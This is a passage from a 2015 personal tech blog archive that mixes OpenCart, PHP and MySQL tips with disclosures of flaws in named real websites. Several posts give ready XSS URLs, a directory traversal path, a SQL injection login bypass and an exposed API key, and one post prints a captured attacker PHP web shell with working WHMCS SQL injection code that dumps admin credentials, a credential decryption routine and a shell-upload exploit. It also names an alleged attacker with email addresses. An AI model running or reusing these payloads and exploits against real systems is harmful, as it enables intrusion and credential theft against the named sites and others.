   ActionResult = oDNS.CreateARecordEx(DomainID, "ftp", oFTP.GetFTPIPEx(DomainID))

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "    [+] Adding...    DNS A Record: MAIL!"
   ActionResult = oDNS.CreateARecordEx(DomainID, "mail", oEmail.GetMailIPEx(DomainID))

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "    [+] Adding...    DNS MX Record: MAIL! [" & rsService("ServicePriority") & "]"
   ActionResult = oDNS.CreateMXRecordEx(DomainID, "mail." & LCase(DomainName), rsService("ServicePriority"))

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "  [>] Fixing...   Removing and adding existing domain alias's!"

   If Not rsDomainAlias.EOF Then rsDomainAlias.MoveFirst
   Do While Not rsDomainAlias.EOF
      DomainAliasID = rsDomainAlias("DomainAliasID")
      AliasName = rsDomainAlias("AliasName")
    
      If AliasName <> "" Then
         WScript.Echo "    [-] Removing...  Alias: " & UCase(AliasName) & "!"
         ActionResult = oDomainAlias.DeleteEx(DomainAliasID)
         If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
         End If

         WScript.Echo "    [+] Adding...    Alias: " & UCase(AliasName) & "! New ID: " & oDomainAlias.AddEx(DomainID, AliasName)
      End If
      rsDomainAlias.MoveNext
   Loop

   WScript.Echo "  [>] Adding...   Global DNS Records from reseller: " & ResellerAccountNumber & "!"

   If Not rsGlobalDNS.EOF Then rsGlobalDNS.MoveFirst
   Do While Not rsGlobalDNS.EOF
      Select Case rsGlobalDNS("RecordType")
         Case DNS_A
          WScript.Echo "    [+] Adding...    DNS A Record: " & UCase(rsGlobalDNS("RecordName")) & "!"
          ActionResult = oDNS.CreateARecordEx(DomainID, rsGlobalDNS("RecordName"), Replace(rsGlobalDNS("RecordData"), "[DomainName]", DomainName))
          If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
          End If
       Case DNS_MX
          WScript.Echo "    [+] Adding...    DNS MX Record: " & UCase(rsGlobalDNS("RecordData")) & "!"
          ActionResult = oDNS.CreateMXRecordEx(DomainID, Replace(rsGlobalDNS("RecordData"), "[DomainName]", DomainName), rsGlobalDNS("RecordPreference"))
          If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
          End If
       Case DNS_CNAME
          WScript.Echo "    [+] Adding...    DNS CNAME Record: " & UCase(rsGlobalDNS("RecordName")) & "!"
          ActionResult = oDNS.CreateCNAMERecordEx(DomainID, rsGlobalDNS("RecordName"), Replace(rsGlobalDNS("RecordData"), "[DomainName]", DomainName))
          If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
          End If
       Case DNS_TXT
          WScript.Echo "    [+] Adding...    DNS TXT Record: " & UCase(rsGlobalDNS("RecordName")) & "!"
          ActionResult = oDNS.CreateTXTRecordEx(DomainID, rsGlobalDNS("RecordName"), Replace(rsGlobalDNS("RecordData"), "[DomainName]", DomainName))
          If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
          End If
     End Select
      rsGlobalDNS.MoveNext
   Loop

   WScript.Echo "  [>] Adding...   Global DNS Records from the ADMIN account!"

   If Not rsGlobalDNSAdmin.EOF Then rsGlobalDNSAdmin.MoveFirst
   Do While Not rsGlobalDNSAdmin.EOF
      Select Case rsGlobalDNSAdmin("RecordType")
         Case DNS_A
          WScript.Echo "    [+] Adding...    DNS A Record: " & UCase(rsGlobalDNSAdmin("RecordName")) & "!"
          ActionResult = oDNS.CreateARecordEx(DomainID, rsGlobalDNSAdmin("RecordName"), Replace(rsGlobalDNSAdmin("RecordData"), "[DomainName]", DomainName))
          If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
          End If
       Case DNS_MX
          WScript.Echo "    [+] Adding...    DNS MX Record: " & UCase(rsGlobalDNSAdmin("RecordData")) & "!"
          ActionResult = oDNS.CreateMXRecordEx(DomainID, Replace(rsGlobalDNSAdmin("RecordData"), "[DomainName]", DomainName), rsGlobalDNSAdmin("RecordPreference"))
          If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
          End If
       Case DNS_CNAME
          WScript.Echo "    [+] Adding...    DNS CNAME Record: " & UCase(rsGlobalDNSAdmin("RecordName")) & "!"
          ActionResult = oDNS.CreateCNAMERecordEx(DomainID, rsGlobalDNSAdmin("RecordName"), Replace(rsGlobalDNSAdmin("RecordData"), "[DomainName]", DomainName))
          If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
          End If
       Case DNS_TXT
          WScript.Echo "    [+] Adding...    DNS TXT Record: " & UCase(rsGlobalDNSAdmin("RecordName")) & "!"
          ActionResult = oDNS.CreateTXTRecordEx(DomainID, rsGlobalDNSAdmin("RecordName"), Replace(rsGlobalDNSAdmin("RecordData"), "[DomainName]", DomainName))
          If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
          End If
     End Select
      rsGlobalDNSAdmin.MoveNext
   Loop

   WScript.Echo ""
   rsDomain.MoveNext
Loop
WScript.Echo "Total Domains Processed: " & iCount

Set rsDomain = Nothing
Set rsGlobalDNS = Nothing
Set rsGlobalDNSAdmin = Nothing
Set rsDomainAlias = Nothing
Set rsDNS = Nothing
Set rsServiceSet = Nothing
Set rsService = Nothing

Set oDomain = Nothing
Set oDNS = Nothing
Set oFTP = Nothing
Set oEmail = Nothing
Set oWebsite = Nothing
Set oService = Nothing
Set oServiceSet = Nothing
Set oDomainAlias = Nothing
Set oGlobalDNSRecord = Nothing

Friday, 25 September 2015

How to insert an opencart category with SQL only

How to insert an opencart category with SQL only.




I've always set the default store (0).


SET @catname = 'MyCategory';

INSERT INTO `test`.`oc_category` (`category_id`, `image`, `parent_id`, `top`, `column`, `sort_order`, `status`, `date_added`, `date_modified`) VALUES (NULL, '', '0', '0', '1', '0', '1', '2015-09-02 00:00:00', '2015-09-02 00:00:00');
SET @lastinsert = LAST_INSERT_ID();


/*2 insert for  language id 1english and id 2 italian - in my case*/
INSERT INTO `test`.`oc_category_description` (`category_id`, `language_id`, `name`, `description`, `meta_title`, `meta_description`, `meta_keyword`) VALUES (@lastinsert, '1', @catname, @catname, @catname, @catname, @catname);
INSERT INTO `test`.`oc_category_description` (`category_id`, `language_id`, `name`, `description`, `meta_title`, `meta_description`, `meta_keyword`) VALUES (@lastinsert, '2', @catname, @catname, @catname, @catname, @catname);

INSERT INTO `test`.`oc_category_to_store` (`category_id`,`store_id`) VALUES( @lastinsert, '0');
INSERT INTO `oc_url_alias` (`query`, `keyword`) VALUES (CONCAT('category_id=', @lastinsert ), @catname);
INSERT INTO `oc_category_path` (`category_id`, `path_id`, `level`) VALUES (@lastinsert, @lastinsert, '0') ;

Tuesday, 22 September 2015

http://www.foliopages.com/php-photo-gallery-no-database XSS, files informations leakage, directory traversal

http://www.foliopages.com/php-photo-gallery-no-database


Sample XSS
http://www.foliopages.com/demos/folio-gallery/demo.php?album=Big+Bear+California</title><script>alert('http://trueliarx.blogspot.com');</script>

(with multiple pages)

http://www.foliopages.com/demos/folio-gallery/demo.php?album=Big+Bear+California&p=<script>alert('http://trueliarx.blogspot.com');</script>


http://localhost/demo.php?album=frankenstein%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C


Errors

Warning: scandir(albums/Big Bear California</title><script>alert('http://trueliarx.blogspot.com');</script>): failed to open dir: No such file or directory in /home/foliopag/public_html/demos/folio-gallery/folio-gallery.php on line 162

Warning: scandir(): (errno 2): No such file or directory in /home/foliopag/public_html/demos/folio-gallery/folio-gallery.php on line 162

Warning: Invalid argument supplied for foreach() in /home/foliopag/public_html/demos/folio-gallery/folio-gallery.php on line 165
There are no photos in this album!

view other folder names
http://www.foliopages.com/demos/folio-gallery/demo.php?album=../../../../../../../../../../../../../../../home/foliopag/public_html/dancer

Hot to get the file extension with PHP.

An easy way to get the extension of a file  with php.

$src = 'myname.jpg';

$arr = explode('.',$src);
$extension = $arr[count($arr)-1];

$echo $extension;


The result will be 'jpg'.

Sunday, 20 September 2015

Opencart - css - set image thumbnail preview rectangle border to fit the image (ex. square)


Opencart - css - set image thumbnail preview rectangle border to fit the image (ex. square)


Add in your stylesheet.css


/*fix centering the product thumbnails and resizing to square*/
.thumbnail {
display: inline-block;

}
.thumbnails li {
    text-align: center;
}
/*end of fix*/

https://www.myfonts.com/ | raising errors - no tests

https://www.myfonts.com/
Error raised by using a specific image that doesn't fit any kind of character. Submit without any value to get the error. That's all.











( ! ) Warning: implode(): Invalid arguments passed in /home/serve_me/www/trunk/include/WhatTheFont/Utils.php on line 24
Call Stack
#TimeMemoryFunctionLocation
10.0000246064{main}( ).../rewrite.php:0
20.02461993640require( '/home/serve_me/www/trunk/webroot/widgets/wtf/wtf.php' ).../rewrite.php:52
30.03003346192require( '/home/serve_me/www/trunk/webroot/widgets/wtf/results.php' ).../wtf.php:19
40.04843572104WhatTheFont\WhatTheFont->getFontMatches( ).../results.php:29
50.04843572336WhatTheFont\Client->getResult( ).../WhatTheFont.php:192
60.04843572336WhatTheFont\Client->attemptConnection( ).../Client.php:227
70.05003572872WhatTheFont\Client->getMessage( ).../Client.php:208
80.05003573080WhatTheFont\Utils::convertCharacters( ).../Client.php:195
90.05003573304implode ( ).../Utils.php:24

( ! ) Warning: implode(): Invalid arguments passed in /home/serve_me/www/trunk/webroot/widgets/wtf/results.php on line 37
Call Stack
#TimeMemoryFunctionLocation
10.0000246064{main}( ).../rewrite.php:0
20.02461993640require( '/home/serve_me/www/trunk/webroot/widgets/wtf/wtf.php' ).../rewrite.php:52
30.03003346192require( '/home/serve_me/www/trunk/webroot/widgets/wtf/results.php' ).../wtf.php:19
40.07933645072implode ( ).../results.php:37

Wednesday, 16 September 2015

How to show PHP errors in the web browser - the php error reporting

When you need to show all the PHP errors in the browsers just use this code

ini_set('display_errors',1);
ini_set('display_startup_errors',1);
error_reporting(E_ALL);

It should work with any version of PHP to report quite any kind of PHP error while you are debugging your code.

Remember to disable the error reporting when in production.



Saturday, 12 September 2015

FIX - phpmysql error - #1273 - #1273 - Unknown collation: 'utf8mb4_general_ci' - with sql file only

How to FIX - phpmysql error - #1273 - #1273 - Unknown collation: 'utf8mb4_general_ci'

Why does it happens?

The utf8mb4_unicode_ci is supported only on mysql servers 5.5.3+ and you will not be available on older servers. That's all.










The worst solution

if you have only an sql file you can TRY to

... COLLATE utf8mb4_unicode_ci
to
utf8_general_ci

but it's NOT SAFE because you can probably have problems with the encoding!!! I've tested and it also works but really don't know if there can be consequences.


The best solution


Export from the original database in utf8_general_ci or, if you just have the sql, Import your data in a newer mysql server (5.5.3+) and export again with utf8_general_ci!


Another way to do it
If you want to operate on a live database run this sql for each table.

ALTER TABLE name-of-table CONVERT TO CHARACTER SET utf8 COLLATE utf8_general_ci


Sample (crappy) php code


<?php
 $dbuser = 'test2';
 $dbpassword = 'test2';
 $dbhost = 'localhost';
 $dbname = 'test2';
    $dbconn=mysqli_connect($dbhost, $dbuser, $dbpassword);
    mysqli_select_db($dbconn,$dbname);
    $mydata=mysqli_query($dbconn, 'show tables');
    while($mytables = mysqli_fetch_array($mydata)) {
       foreach ($mytables as $myktable => $mytable) {
        mysqli_query($dbconn, "ALTER TABLE $mytable CONVERT TO CHARACTER SET utf8 COLLATE utf8_general_ci");

       }

    }
?> 
 
 
and then export your data.




This happened with several cms like wordpress, joomla, magento, opencart, drupal, smf forums, etc.

It's not a problem related to the scripts!

Monday, 7 September 2015

[FIX] An exception occured in driver: could not find driver

Usually the error occurs when PDO is not enabled and pdo sqlite could not find driver.

Go to your php.ini configuration file and uncomment or add

extension=php_pdo_sqlite.dll

make sure that also
extension=php_sqlite3.dll
is enabled.

Restart your web server.

how to use owncloud on windows server

Even if it's not suggested you can run ownlcoud scripts on your local windows server

go in /lib/private/util.php
and comment or remove near line 581:

/*
        if(OC_Util::runningOnWindows()) {
            $errors[] = [
                'error' => $l->t('Microsoft Windows Platform is not supported'),
                'hint' => $l->t('Running ownCloud Server on the Microsoft Windows platform is not supported. We suggest you ' .
                    'use a Linux server in a virtual machine if you have no option for migrating the server itself. ' .
                    'Find Linux packages as well as easy to deploy virtual machine images on <a href="%s">%s</a>. ' .
                    'For migrating existing installations to Linux you can find some tips and a migration script ' .
                    'in <a href="%s">our documentation</a>.',
                    ['https://owncloud.org/install/', 'owncloud.org/install/', 'https://owncloud.org/?p=8045'])
            ];
        } */



Thursday, 3 September 2015

axioscloud.it | xss, system compromise


There are too many server/sites in this case. Append that string:
<video src=1 onerror=alert('testamento')>

From server
https://re1.axioscloud.it/Secret/RELogOff.aspx?Error_Desc=
to (change the initial RE part with nr) server
https://re35.axioscloud.it/Secret/RELogOff.aspx?Error_Desc=

https://redemo.axioscloud.it/Secret/RELogOff.aspx?Error_Desc=





www.sissiweb.it - the system is already compromised - win

Tuesday, 1 September 2015

ancelleinrete.it | system compromise


path: /var/www/vova/data/www/ancelleinrete.it/

passwd

Saturday, 29 August 2015

Mass move your categories in another store (id) in opencart

 With this simple sql query we are going to add, in an easy and fast way, the categories in another store

INSERT into `oc_category_to_store` (category_id, store_id) SELECT category_id, 0 from oc_category;

Replace the 0 (zero) with the id of the other store(id).

Thursday, 27 August 2015

Problem with facebook business page that cannot be shown on mobile - cannot search facebook page via smartphone

Problem with facebook business page that cannot be shown on mobile - cannot search facebook page via smartphone


Facebook business page cannot be found on facebook mobile from any kind of mobile device.


You can try:

- to contact the facebook's customer care ... that doesn't reply too often.

- to unpublish (hide) and publish your facebook page. This method works for pages that cannot be reached at all (desktop and mobile).

- Merge eventual duplicate facebook business pages. Maybe the problem is that only one will show in the searches.

- make sure to configure/assign the definitive facebook web address from the page settings.


Those are NOT definitive solutions!



Problema pagina facebook business non presente da mobile - impossibile cercarla da telefono


Una pagina facebook business non viene trovata nelle ricerche da mobile e non è possibile accedere da qualsiasi telefono


Potete provare a:

- a contattare assistenza facebook ... che non risponde spesso.

- a nascondere e ripubblicare la pagina. Il metodo funziona(va) per pagine che non si vedono da desktop e mobile.

- a Unire eventuali pagine business doppione. Una si vede e l'altra no.

- assicuratevi di aver impostato l'indirizzo facebook per la pagina.


Non sono soluzioni sicure ma sono le ipotesi che ho potuto fare quando si è posto tale problema!

Wednesday, 26 August 2015

http://www.instat.gov.al | possible Sql injection, data leak, data dump

http://www.instat.gov.al/al/figures/statistical-databases/select.aspx?rxid=1df185c6-c85e-4c8d-b7ae-d400ecedf852&px_tableid=LSMS51

LSMS51 seems to be the table and we can inject sql/data queries.

http://www.akp.gov.al/ | joomla 1.7 with bugs

http://www.akp.gov.al/ | joomla 1.7 with bugs

www.qkr.gov.al | XSS

sample:
www.qkr.gov.al/nrc/SearchPage.aspx?find=search:"><script>alert(1);</script><"&t=3

Thursday, 20 August 2015

http://www.domaindirect.it/ | sql injection, data dump, XSS

http://www.domaindirect.it/cat/tre%20lettere/page=XXX

It's possible to create a sql injection in several parts of the website.

the php website is using Zend


XSS
www.domaindirect.it/search/"><script>alert(1);</script>

http://www.martialart.it | sys compromise, path disclosure, etc

path: /web/htdocs/www.martialart.it/home/firedragon/

 api flickr 5975c197350037e77999ef112ec76cbe

Sunday, 16 August 2015

https://www.msweb2000.ca/ | sql injection at login

https://www.msweb2000.ca/ | sql injection at login

admin
a' or 1=1 --'

Wednesday, 12 August 2015

newshell.it | sql injections, system compromise, plesk remote exploit

https://newshell.it/index.php?action=utente&utenteAction=login

Sql injection in the login area

__________________________

https://mac.newshell.it:8443


https://xen1001.newshell.it:8443/
https://www.registrazionedomini.in:8443/
plesk + apache - remote exploit problem

Saturday, 8 August 2015

Best SEO practice to redirect a domain to your own

Use a php page (index.php) with a 301 Moved Permanently

<?php
// 301 Moved Permanently
header("Location: http://www.bnit.it",TRUE,301);

?>

Friday, 7 August 2015

php shell found on a hacked server

php shell found on a hacked server

andriroot@gmail.com is the email of the attacker. He's known as andri Cyber4rt, he's from jakarta,
he usually use the same email for frauds, he usually abuses of old bugs of whcms, plesk and so on.
His alt. email address is andri.cyber4rt@gmail.com.


 if(strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
function printLogin(){
echo "<html><head><title>./DM ExploiterZ [ 0day ]</title>
<style>body {font-family: 'Audiowide',serif;font-size: 20px;} </style></head>
<body bgcolor=black><center><br><br>
<nobr><font face=Audiowide color=blue>ExploiterZ <font color=white>[ 0day ]</font></nobr><br><br>
<form method=post>
<img src='https://fbcdn-photos-c-a.akamaihd.net/hphotos-ak-ash3/t1/994064_479867415465112_1199170647_n.jpg'><br><br>
:: Password :: <br><br>
<input size=30 style='color:blue;background-color:#000000' type='password' name='pass'>
<input style='color:blue;background-color:#000000' type=submit value=' Login Cuk '></font></form><br><br>";
exit;
}
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])] )) {
if(empty($auth_pass) || (isset( $_POST['pass']) && (md5($_POST['pass']) == $auth_pass))) {
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
} else {
printLogin();
}
}
set_time_limit(0);
error_reporting(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = 'andriroot@gmail.com'; # ganti dengan email kamu

$error[] = 'You have an error in your SQL';
$error[] = 'supplied argument is not a valid MySQL result resource in';
$error[] = 'Division by zero in';
$error[] = 'Call to a member function';
$error[] = 'Microsoft JET Database';
$error[] = 'ODBC Microsoft Access Driver';
$error[] = 'Microsoft OLE DB Provider for SQL Server';
$error[] = 'Unclosed quotation mark';
$error[] = 'Microsoft OLE DB Provider for Oracle';
$error[] = 'Incorrect syntax near';
$error[] = 'SQL query failed';

function cut($start,$end,$top){
$c =strlen($start);
$desc= strstr("$top","$start");
$count = strpos("$desc","$end");
$desc = substr($desc,$c,$count-$c);
return $desc;
}

function tengah($string, $awal, $akhir){
$string = " ".$string;
$strings = strpos($string,$awal);
if ($strings == 0) return "";
$strings += strlen($awal);
$antara = strpos($string,$akhir,$strings) - $strings;
return substr($string,$strings,$antara);
}

function konek($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if($data) {
return $data;
} else {
return 0;
}
}

function filter($string){
if(get_magic_quotes_gpc() != 0){
return stripslashes($string);
} else {
return $string;
}
}


function letItBy(){
ob_flush();
flush();
}

function getAlexa($url){
$xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
$rank1 = $xml->SD[1];
if($rank1)
$rank = $rank1->POPULARITY->attributes()->TEXT;
else
$rank = 0;
return $rank;
}


function google($query, $page=1){
$resultPerPage=8;
$start = $page*$resultPerPage;
$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=en&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
$resultFromGoogle = json_decode( http_get($url, true) ,true);
if(isset($resultFromGoogle['responseStatus'])) {
if($resultFromGoogle['responseStatus'] != '200') return false;
if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
else return $resultFromGoogle['responseData']['results'];
}
else
die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
}

function http_get($url, $safemode = false){
if($safemode === true) sleep(1);
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close();
}

function hajar($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}
else
return "Fail!";
}
else
return "Fail!";
}

function hack1($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,roleid,0x3a,username,0x3a,email,0x3a3a3a3a3a) FROM tbladmins ORDER BY id ASC),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}
else
return "Fail!";
}
else
return "Fail!";
}

function hack2($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,password,0x3a3a3a3a3a) FROM tbladmins ORDER BY id ASC),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}
else
return "Fail!";
}
else
return "Fail!";
}


function dm($url,$injection){
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,($injection),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?)::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}else{
return "Fail!";
}
}else{
return "Fail!";
}
}

function get_base_dir($URL) {
$URL = str_replace("http://","",$URL);
$URL = str_replace("https://","",$URL);
$parts = explode('/',$URL);
$newURL = "http://";
for ($i = 0; $i < count($parts); $i++) {
if(strpos($parts[$i],'.php') == false)
$newURL .= $parts[$i] . "/";
}
return $newURL;
}
 
function vb_vuln($URL) {
$URL = str_replace("http://","",$URL);
$URL = str_replace("https://","",$URL);
$URL = str_replace(".php","",$URL);
$xURL = explode("/",$URL);
$count = 0;
foreach ($xURL as $dir) {
if($count != 0)
$URL = $URL . $dir . "/";
else $URL = $dir;
$source = "";
$arr = parse_url('http://' . $URL);
if(strpos($URL, '?')) return 'EOF';
if(substr($URL, -1, 1) != '/') $URL = $URL . '/';
if(!$arr['scheme']) $URL = 'http://' . $URL;
$headers = get_headers('http://' . str_replace("//","/",$URL . '/install/upgrade.php'));
if(substr($headers[0], 9, 3) == '200') {
$source = file_get_contents('http://' . str_replace("//","/",$URL . '/install/upgrade.php'));
GLOBAL $victimURL;
$victimURL = $URL . "/install/upgrade.php";
if(strpos($source,'Begin Upgrade') != false)
return "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
}
elseif($headers = get_headers('http://' . str_replace("//","/",$URL . '/core/install/upgrade.php'))) {
if((substr($headers[0], 9, 3) == '200' || substr($headers[0], 9, 3) == '302') && substr($headers[7], 9, 3) != '404') {
$source = file_get_contents('http://' . str_replace("//","/",$URL . '/core/install/upgrade.php'));
GLOBAL $victimURL;
$victimURL = $URL . "/core/install/upgrade.php";
if(strpos($source,'Begin Upgrade') != false)
return "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
}
}
$hash ="";
preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res);
foreach ($res[1] as $hash) {
if(strlen($hash) == 32)
return $hash;
}
preg_match_all('|var CUSTNUMBER="(.*?)";|', $source, $res);
foreach ($res[1] as $hash) {
if(strlen($hash) == 32)
return $hash;
}
$count++;
}
}

function check_injection($url){
$data = http_get( str_replace("=", "='", $url) );
$errors = implode("|", $GLOBALS['error']);
return preg_match("#{$errors}#i", $data);
}

function req($url,$fields){
$opts = array(
CURLOPT_HEADER =>1,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_URL => 'http://www.sms-online.web.id/'.$url,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $fields,
);
$ch=curl_init();
curl_setopt_array($ch,$opts);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}

function fc_vuln($url) {
$shell = dirname($url) . '/temp/ganteng.php';
$url = dirname($url) . '/upload.php';
$postFields = array();
$filePath = "/home/cpdebx/public_html/fc/ganteng.php";
$postFields['file'] = "@$filePath";
$curl_handle = curl_init();
curl_setopt($curl_handle, CURLOPT_URL, $url);
curl_setopt($curl_handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_handle, CURLOPT_POST, true);
curl_setopt($curl_handle, CURLOPT_POSTFIELDS, $postFields);
$result = curl_exec($curl_handle);
curl_close($curl_handle);
if(strpos($result,"@ganteng.php") != false)
return $shell;
else
return "Fail!";
}

function inject($url,$anu){
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,($anu),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?)::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}else{
return "Fail!";
}
}else{
return "Fail!";
}
}

function dec($string,$cc_encryption_hash){
$key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
$hash_key = _hash($key);
$hash_length = strlen($hash_key);
$string = base64_decode($string);
$tmp_iv = substr($string,0,$hash_length);
$string = substr($string,$hash_length,strlen ($string) - $hash_length);
$iv = $out = '';
$c = 0;
while ($c < $hash_length){
$iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
++$c;
}
$key = $iv;
$c = 0;
while ($c < strlen($string)){
if(($c != 0 AND $c % $hash_length == 0)){
$key = _hash($key . substr($out,$c - $hash_length,$hash_length));
}
$out .= chr(ord($key[$c % $hash_length]) ^ ord ($string[$c]));
++$c;
}
return $out;
}
function _hash($string){
$hash = (function_exists('sha1')) ? sha1($string):md5($string);
$out = '';
$c = 0;
while ($c < strlen($hash)){
$out .= chr(hexdec($hash[$c] .$hash[$c + 1]));
$c += 2;
}
return $out;
}

useless asp stuff found on an hacked server

useless asp  stuff found on an hacked server

<%
if request.QueryString("1")<>2 then
response.Write "<iframe src=""http://127.0.0.1"" width=100% height=100% frameborder=0></iframe>"
response.End()
end if
%>
<%
